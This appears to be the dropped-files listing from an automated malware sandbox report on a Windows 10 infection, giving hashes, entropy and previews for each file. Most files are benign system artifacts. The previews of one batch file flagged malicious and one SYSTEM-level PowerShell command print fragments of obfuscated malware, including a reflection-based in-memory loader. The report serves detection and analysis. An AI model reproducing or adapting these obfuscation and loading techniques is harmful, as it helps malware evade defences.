                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.2.8.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.436875741874379
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsSJg771I9fFyWpW8VYT0Ym8M4JQ9wSFRyq8vlw1ytfhd:uIjfgI7EF7VKBJQGSWu1ufhd
                            MD5:2E7AF1C2D5455D8BD63955ADCD51D1CA
                            SHA1:8E81343878DEF226DC1277F09E2F42D745B56CB4
                            SHA-256:02C13AE00132915770DF9ABB6EC83AE10C4227FA42AFA44636E92FEB76CEAE3C
                            SHA-512:9B4955C2C8DEB052381A230C2A5E694E7739EEFD910FEAD0BD45B1815C56E260A34017C444679CF7B096AEA750A1F93B89ABA2B4BF4CF8610629A2957D307BAE
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 07:42:09 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):929658
                            Entropy (8bit):3.461112606558634
                            Encrypted:false
                            SSDEEP:6144:JvM4JE70/iM52zie+wdfd3lD6P3cwI/Lq8jEKr3QGnpK0K:eM52zie+o3NA3Bcq8jEKrQGnp
                            MD5:01906B17B4E0673452E66F364167027B
                            SHA1:59C6FE188D94AA7562042052151AD5A0A039794F
                            SHA-256:8694B873A8C186696BAD061EDB951963A4E95FEA77A0EBC2FB0E9B99BB66B9D1
                            SHA-512:462923DB93CAE2F913C6BAF3B3185BADC93FA7CD4A192160B6B71FC962B205ECFFF80A2D0300DD6CEE0B385A8F532B7B07B9B17EC104248813081C00B873074F
                            Malicious:false
                            Preview:MDMP..a..... .......Q..f............T............'..h....... ;...3......T...............`.......8...........T...........`_..............4n.......... p..............................................................................eJ.......p......Lw......................T...........J..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8582
                            Entropy (8bit):3.693509751945523
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJf1L3O6YHD61gmfZaP4pWEM89bb1Psfpzpm:R6lXJtrO6Yj61gmfQPYbmfa
                            MD5:2D0362889AB324F37447CE118E10AA1F
                            SHA1:22404E67C9777467F4DF17B789448563D1366C5F
                            SHA-256:6BCED54C544A05B0A5A033EECFD1CCC4E1D42122FEEF9C6EA48C15AACC8A1A81
                            SHA-512:5C71E3757CFC1F8C59E0CDE020E18BBDD7EB3A8625B82E8EB31BA5B7E822CC9DEC83F673BCC23825790CCFD1401B8E36E2EB9E2CBAA8ABBF6031824B68EE946E
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.4.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.433221160182472
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsLtJg771I9fFyWpW8VYJ5Ym8M4JQ9wSFKLoyq8vlwOytfjd:uIjfLHI7EF7V6oJQGJMWuOufjd
                            MD5:DFBAB05D482F5526D54EE52B5FB16057
                            SHA1:E266952E1D8D6B1FAB0AD130B062969B5A1BDBCA
                            SHA-256:248DE062EA64BD2AC8F0E6B81CCC293F4D885BFF18567FEBD1A001DD10FDA1DB
                            SHA-512:6371C8494E79DE08F2333EF333C8D63FF22CC1CBFDEC986E5445655203CE2791AA2DE51AFCBF848E49C008B6E9ACE114DC399FE56A67FDCD395674B4CC3A57E9
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528404" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2916
                            Entropy (8bit):5.370813493058233
                            Encrypted:false
                            SSDEEP:48:4SaAzsSU4Yymdax4RIoUP7m9qr9t5/78NfpHcRDGx3axIZVEouNHJBVrH/jCB:taAzlHYv+IfB9qrh7KfpRjPEo2dL8
                            MD5:D689C25F0EDEEC305A2F2409A351E182
                            SHA1:BD5874971D56F1ED49E405FF4FAFD25F323BD41A
                            SHA-256:29A8A13B5957E5011C76C9CF249DBB7B8110C1761401021B29D135B11232D097
                            SHA-512:5FA6A8C21ED92F810CFCBC56A5741C25D7209EFC1E84BB3F8A4600D2F3BAB4FF45DCBAE8677D1943B7F2C8DC94A431890ACC6F5CF2F50911E36D80926BB21A34
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS executable (COM, 0x8C-variant)
                            Category:modified
                            Size (bytes):352
                            Entropy (8bit):7.415109904127954
                            Encrypted:false
                            SSDEEP:6:iAxVJnCsMCy4a66fS8D7EeYuzRZB4fUHs1+gG7iMn4R4jGmSpvh7cV+U:/c5CyFdPHPzF4fUHsAgGGMn4R4jTgJ1U
                            MD5:FE5F105C5FE691A4724079A34C3FD002
                            SHA1:607724412F46E8221F65C2869DF87E7CAA5D288A
                            SHA-256:A6848E3050D90F07544F46CAE503C87A3A3D73E18858D2A60D7D1BF977955096
                            SHA-512:12C60C98B656524FFD488839E5B3A8B594E553C95E0DC796782CAEEB8D86C0A8C75F9385B735DE22C8D78E2E38F0CC1BBDBB4D72AA83833A9641A51D6EAD032C
                            Malicious:false
                            Preview:.<....].q...w..6I+N..j......J.A}.. -..|.J.........M..~bS%.&..E;I.Uf._G..:........\*.T...._..aOl..^..Y8|...g..&.-....Ys.....B.AI6......Sq..Qlp.#&...o...p...p*.."...x.j.1C.P.0....4....+ea'..US[............a.....T.f.U_0...>...H...I.{7G..^..?.6.3.9i9....X...5...4..u...E.v:.....wb.7......qXj.nu.e),....t!,0..Q..."..+Mq|p.....W6...+.C...pl...m.V
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4553
                            Entropy (8bit):5.349222050408134
                            Encrypted:false
                            SSDEEP:96:BZtsZ+NTyyqo1ZhZ9sZ+NTyyqo1Z0povTueovTuuZMsZ+NTyyqo1ZppovTueovTV:0EBEK
                            MD5:784CCEAD8246F1D9B0B0233774243374
                            SHA1:05C1B6AB474713446F3310C5463A8BB5CD0FBD08
                            SHA-256:94F81DCB3AA9BF4A2E7261F0735FBB15445C9F72AA3CDEE6E6D7006D898A7CA2
                            SHA-512:093EC3633FDCCBAE61C3DEA292499ADBC9490DEFF9D134C5D19925D4BAE5E14690778FCD00D139B9BF27E46C475E417DB5C5A81D90D1F1EAF4EC442C3D12E7E7
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034233..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034303..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5117
                            Entropy (8bit):5.637283607772319
                            Encrypted:false
                            SSDEEP:96:BZGsZ+NTryqo1ZhZOsZ+NTryqo1ZfpovTueovTukVt7vBpB6a5xY595f8bus3wMp:9E653b5xY595f7s3wMcjIiIIit
                            MD5:141D50A8BBC12D18153D981E74F7421B
                            SHA1:229EFFB65263021AA2609644FC85BC7DCC1886FD
                            SHA-256:6BD9C223DF78316DB7E1C4D348D1B1C5E61CB97F0B01B9807C41AD3B34B3D59C
                            SHA-512:DB76B41B4BCEB8FA968CD4E76FF426FC23E9110F6A2C0D1E0BDF32A0309B709E12DD2510C01D9EAAAD0E9B3FEC0FC9BF6AF365215835F98EAB796544D9C824F4
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034203..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034311..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5125
                            Entropy (8bit):5.642366220416972
                            Encrypted:false
                            SSDEEP:96:BZ/sZ+NTUyqo1ZhZNZsZ+NTUyqo1ZOpovTueovTuOVt7vBpB6a5xY595f8bus3wJ:5AEY53b5xY595f7s3wM5IiIIit
                            MD5:3AD5707222C23F76FFDF0619C8AC6D25
                            SHA1:453EA743B95692E13F665F8F0EC46B3BBBAA0C4D
                            SHA-256:EBA01D3DF9AF7A904BB764BBA987782A74E2252D9F315D5EFFC6304FDB2E6288
                            SHA-512:08A607B366A901B62CD32BE7DDC373CDC33ABFFA16BF3A90783C87B301DE2DA4F59B8F9E594BAE0FAC150CB409EE8A02DCEC178E850660F358FC45DFA999A677
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034257..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034327..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5214429
                            Entropy (8bit):6.008710946572079
                            Encrypted:false
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            MD5:19FC666F7494D78A55D6B50A0252C214
                            SHA1:8876CD520507CBFDC2E89E449BABA52232A1DF1B
                            SHA-256:E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
                            SHA-512:94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
                            Malicious:true
                            Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (5360), with CRLF line terminators
                            Category:dropped
                            Size (bytes):11484
                            Entropy (8bit):5.34259826985146
                            Encrypted:false
                            SSDEEP:192:NIvawYQo0dZcT2IUwB2IvawYQo0dZcT2IUwBS:NIvpYl0oD2IvpYl0oDS
                            MD5:5AD398834C8E25723975DED4B2D02597
                            SHA1:5EA89BAD95268DA60FF5123220E5C6E9592605B4
                            SHA-256:A7E6F5069C4185EC5523D5951C49C9034A91ACC6F367B022A52CB72424CE0558
                            SHA-512:981A90B488F64FBB54CCE44BE5A8361CEE66696D46DA6145DD99BFD5D7D9656D095DAB58EB8CB9BB1BD28C4C95917A9872B66D08E568CF2977603536EA10F659
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034312..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](10
                            Process:C:\Windows\System32\svchost.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3488
                            Entropy (8bit):3.5872466257032647
                            Encrypted:false
